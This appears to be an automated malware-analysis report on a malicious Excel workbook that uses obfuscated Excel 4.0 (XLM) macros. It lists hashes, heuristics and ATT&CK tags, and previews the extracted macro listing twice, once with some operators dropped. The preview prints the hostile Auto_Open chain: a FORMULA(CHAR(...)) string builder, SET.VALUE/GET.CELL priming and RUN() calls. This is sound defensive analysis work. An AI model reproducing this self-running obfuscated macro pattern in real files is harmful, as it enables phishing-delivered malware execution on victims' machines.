Office (OLE) malware analysis — malicious · e03dbe96e017de04

MALICIOUS

Office (OLE)

231.0 KB Created: 2020-05-15 06:54:06 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: c75c9957066e2aa1aa2ad7f5d419b384 SHA-1: 5f952b24bf737d9a1f1660c9738849b32f1d4003 SHA-256: e03dbe96e017de046d829c8952f2399093d65b97969b101f46bf5642b1f7b607

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains critical heuristics indicating obfuscated Excel 4.0 macros with an Auto_Open execution chain. The macro attempts to construct a string using character manipulation and then execute it via the RUN function, which is a common technique for downloading and executing further stages. The presence of an Auto_Open entry suggests it is designed to run automatically upon opening the document, aligning with a spearphishing attachment attack vector.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 128571 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	128571 bytes
SHA-256: `6a2b54b9933a1eba5cf2bc1a3cf2226c9341a9021099c8664c5f9a2f72abb7c1`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!JT413 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,ER8,"",-363.00000000000000000000 ' Sheet,EI34,"",-14.00000000000000000000 ' Sheet,BL75,"",35.00000000000000000000 ' Sheet,GA79,"",43.30003906249999801048 ' Sheet,IY142,"",6.66666666666666696273 ' Sheet,DI143,"",3292.50000000000000000000 ' Sheet,DI148,"",198.00000000000000000000 ' Sheet,FT153,"",79.00000000000000000000 ' Sheet,EV158,"",25.00000000000000000000 ' Sheet,CX175,"",0.13347022587268994598 ' Sheet,DO266,"",0.01310498883097542880 ' Sheet,BA277,"",12.26804123711340288594 ' Sheet,CP301,"",-5.32394366197183099843 ' Sheet,ET341,"",-1741.50000000000000000000 ' Sheet,O374,"",-7.43750000000000000000 ' Sheet,FD374,"",0.69444544444444444853 ' Sheet,HT404,"",395.00000000000000000000 ' Sheet,ED411,"",105.00000000000000000000 ' Sheet,JT413,"SET.VALUE(CB1319,GET.CELL(24,IE39068)-132)","" ' Sheet,JT414,RUN(EU38718),"" ' Sheet,II435,"",-0.57983193277310929314 ' Sheet,JI492,"",3264.50000000000000000000 ' Sheet,JK570,"",8.00000000000000000000 ' Sheet,EH595,"",382.00000000000000000000 ' Sheet,ID601,"",0.30989010989010989938 ' Sheet,IX639,"",4.63917525773195915662 ' Sheet,IQ642,"",0.56896551724137933714 ' Sheet,CX662,"FORMULA(CHAR(IT28227-GV19766)&CHAR(J48928-EI51226)&CHAR(I62219CO7248)&CHAR(I62219-EW58620)&CHAR(CH32138BH14151)&CHAR(J48928+Y46754)&CHAR(CC10789/HX4404)&CHAR(CC10789/E64398)&CHAR(HJ22415-DS31199)&CHAR(CH32138+EK3885)&CHAR(CH32138EG24952)&CHAR(CC10789+GZ41878)&CHAR(HZ53104+CM17856)&CHAR(HJ22415/FT52113)&CHAR(J48928-GJ58100)&CHAR(HZ53104/IC54587)&CHAR(HJ22415BA42105)&CHAR(I62219-JC19710)&CHAR(HS43254/DD44930)&CHAR(HS43254-CZ33944)&CHAR(FO27141+N62850)&CHAR(I62219FB59128)&CHAR(FO27141+FR30878)&CHAR(CP40939+EI61873)&CHAR(I62219-CR49665)&CHAR(J48928Y15149)&CHAR(HZ53104/GH26210)&CHAR(CC10789+EC9105)&CHAR(HZ53104+U5376)&CHAR(CC10789JJ54500)&CHAR(HZ53104+HK42308)&CHAR(CH32138+IF48296)&CHAR(CC10789/JR30333)&CHAR(IT28227-DO19569)&CHAR(J48928+GW22505)&CHAR(HS43254FI2905)&CHAR(HS43254/EL30817)&CHAR(J48928+BE20262)&CHAR(HS43254-IB33336)&CHAR(HS43254-IB30680)&CHAR(CP40939+GH36147)&CHAR(HS43254+CY1582)&CHAR(HS43254/F58762)&CHAR(CP40939/HN44701)&CHAR(IT28227Z15430)&CHAR(J48928HU20003)&CHAR(HJ22415-J44637)&CHAR(CC10789-DO56022)&CHAR(CP40939-DH11222)&CHAR(HS43254+CG18680)&CHAR(FO27141-JT59027)&CHAR(IT28227+HI45872)&CHAR(HJ22415/DD40952)&CHAR(HZ53104BL63988)&CHAR(CC10789+HS14287)&CHAR(HS43254/S7274)&CHAR(FO27141-BZ24982)&CHAR(FO27141-HS60035)&CHAR(HJ22415/GV58759)&CHAR(J48928/IJ8159)&CHAR(CH32138+FZ3282)&CHAR(HJ22415/HR27508)&CHAR(HJ22415/FG62104)&CHAR(HZ53104/GR36630)&CHAR(CP40939+GX20883)&CHAR(I62219GG992)&CHAR(CC10789+P53259)&CHAR(J48928IW40613)&CHAR(FO27141JR64960)&CHAR(J48928HW24998)&CHAR(FO27141/EX29109)&CHAR(CP40939JC28675)&CHAR(CC10789/HV47797)&CHAR(FO27141BP59801)&CHAR(CC10789+IB43402)&CHAR(CC10789+FW35940)&CHAR(FO27141IQ58480)&CHAR(FO27141+DB46183)&CHAR(HJ22415-EF45835)&CHAR(HJ22415/EF50310)&CHAR(HJ22415-FO37082)&CHAR(HJ22415-BD19923)&CHAR(IT28227/IQ642)&CHAR(HJ22415/CU23211)&CHAR(I62219+IV37126),GV34139)","" ' Sheet,CX663,RUN(GE1805),"" ' Sheet,IG684,"",157.00000000000000000000 ' Sheet,Q700,"",-40.00000000000000000000 ' Sheet,A704,"",0.42338709677419356092 ' Sheet,CR735,"",-0.62231182795698924970 ' Sheet,DE793,"",-0.11640211640211639565 ' Sheet,CR797,"",-3.79411764705882337267 ' Sheet,JP800,"",-0.22222222222222220989 ' Sheet,GH807,"",-1.57235421166306688079 ' Sheet,JE831,"",-2.76119402985074646750 ' Sheet,CM888,"",-31.54807692307692335021 ' Sheet,DO898,"",429.00000000000000000000 ' Sheet,BJ919,"",-420.00000000000000000000 ' Sheet,BC965,"",-4.42739726027397217933 ' Sheet,GG992,"",0 ... (truncated)

SHA-256: 6a2b54b9933a1eba5cf2bc1a3cf2226c9341a9021099c8664c5f9a2f72abb7c1

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!JT413 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,ER8,"",-363.00000000000000000000
'  Sheet,EI34,"",-14.00000000000000000000
'  Sheet,BL75,"",35.00000000000000000000
'  Sheet,GA79,"",43.30003906249999801048
'  Sheet,IY142,"",6.66666666666666696273
'  Sheet,DI143,"",3292.50000000000000000000
'  Sheet,DI148,"",198.00000000000000000000
'  Sheet,FT153,"",79.00000000000000000000
'  Sheet,EV158,"",25.00000000000000000000
'  Sheet,CX175,"",0.13347022587268994598
'  Sheet,DO266,"",0.01310498883097542880
'  Sheet,BA277,"",12.26804123711340288594
'  Sheet,CP301,"",-5.32394366197183099843
'  Sheet,ET341,"",-1741.50000000000000000000
'  Sheet,O374,"",-7.43750000000000000000
'  Sheet,FD374,"",0.69444544444444444853
'  Sheet,HT404,"",395.00000000000000000000
'  Sheet,ED411,"",105.00000000000000000000
'  Sheet,JT413,"SET.VALUE(CB1319,GET.CELL(24,IE39068)-132)",""
'  Sheet,JT414,RUN(EU38718),""
'  Sheet,II435,"",-0.57983193277310929314
'  Sheet,JI492,"",3264.50000000000000000000
'  Sheet,JK570,"",8.00000000000000000000
'  Sheet,EH595,"",382.00000000000000000000
'  Sheet,ID601,"",0.30989010989010989938
'  Sheet,IX639,"",4.63917525773195915662
'  Sheet,IQ642,"",0.56896551724137933714
'  Sheet,CX662,"FORMULA(CHAR(IT28227-GV19766)&CHAR(J48928-EI51226)&CHAR(I62219*CO7248)&CHAR(I62219-EW58620)&CHAR(CH32138*BH14151)&CHAR(J48928+Y46754)&CHAR(CC10789/HX4404)&CHAR(CC10789/E64398)&CHAR(HJ22415-DS31199)&CHAR(CH32138+EK3885)&CHAR(CH32138*EG24952)&CHAR(CC10789+GZ41878)&CHAR(HZ53104+CM17856)&CHAR(HJ22415/FT52113)&CHAR(J48928-GJ58100)&CHAR(HZ53104/IC54587)&CHAR(HJ22415*BA42105)&CHAR(I62219-JC19710)&CHAR(HS43254/DD44930)&CHAR(HS43254-CZ33944)&CHAR(FO27141+N62850)&CHAR(I62219*FB59128)&CHAR(FO27141+FR30878)&CHAR(CP40939+EI61873)&CHAR(I62219-CR49665)&CHAR(J48928*Y15149)&CHAR(HZ53104/GH26210)&CHAR(CC10789+EC9105)&CHAR(HZ53104+U5376)&CHAR(CC10789*JJ54500)&CHAR(HZ53104+HK42308)&CHAR(CH32138+IF48296)&CHAR(CC10789/JR30333)&CHAR(IT28227-DO19569)&CHAR(J48928+GW22505)&CHAR(HS43254*FI2905)&CHAR(HS43254/EL30817)&CHAR(J48928+BE20262)&CHAR(HS43254-IB33336)&CHAR(HS43254-IB30680)&CHAR(CP40939+GH36147)&CHAR(HS43254+CY1582)&CHAR(HS43254/F58762)&CHAR(CP40939/HN44701)&CHAR(IT28227*Z15430)&CHAR(J48928*HU20003)&CHAR(HJ22415-J44637)&CHAR(CC10789-DO56022)&CHAR(CP40939-DH11222)&CHAR(HS43254+CG18680)&CHAR(FO27141-JT59027)&CHAR(IT28227+HI45872)&CHAR(HJ22415/DD40952)&CHAR(HZ53104*BL63988)&CHAR(CC10789+HS14287)&CHAR(HS43254/S7274)&CHAR(FO27141-BZ24982)&CHAR(FO27141-HS60035)&CHAR(HJ22415/GV58759)&CHAR(J48928/IJ8159)&CHAR(CH32138+FZ3282)&CHAR(HJ22415/HR27508)&CHAR(HJ22415/FG62104)&CHAR(HZ53104/GR36630)&CHAR(CP40939+GX20883)&CHAR(I62219*GG992)&CHAR(CC10789+P53259)&CHAR(J48928*IW40613)&CHAR(FO27141*JR64960)&CHAR(J48928*HW24998)&CHAR(FO27141/EX29109)&CHAR(CP40939*JC28675)&CHAR(CC10789/HV47797)&CHAR(FO27141*BP59801)&CHAR(CC10789+IB43402)&CHAR(CC10789+FW35940)&CHAR(FO27141*IQ58480)&CHAR(FO27141+DB46183)&CHAR(HJ22415-EF45835)&CHAR(HJ22415/EF50310)&CHAR(HJ22415-FO37082)&CHAR(HJ22415-BD19923)&CHAR(IT28227/IQ642)&CHAR(HJ22415/CU23211)&CHAR(I62219+IV37126),GV34139)",""
'  Sheet,CX663,RUN(GE1805),""
'  Sheet,IG684,"",157.00000000000000000000
'  Sheet,Q700,"",-40.00000000000000000000
'  Sheet,A704,"",0.42338709677419356092
'  Sheet,CR735,"",-0.62231182795698924970
'  Sheet,DE793,"",-0.11640211640211639565
'  Sheet,CR797,"",-3.79411764705882337267
'  Sheet,JP800,"",-0.22222222222222220989
'  Sheet,GH807,"",-1.57235421166306688079
'  Sheet,JE831,"",-2.76119402985074646750
'  Sheet,CM888,"",-31.54807692307692335021
'  Sheet,DO898,"",429.00000000000000000000
'  Sheet,BJ919,"",-420.00000000000000000000
'  Sheet,BC965,"",-4.42739726027397217933
'  Sheet,GG992,"",0
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.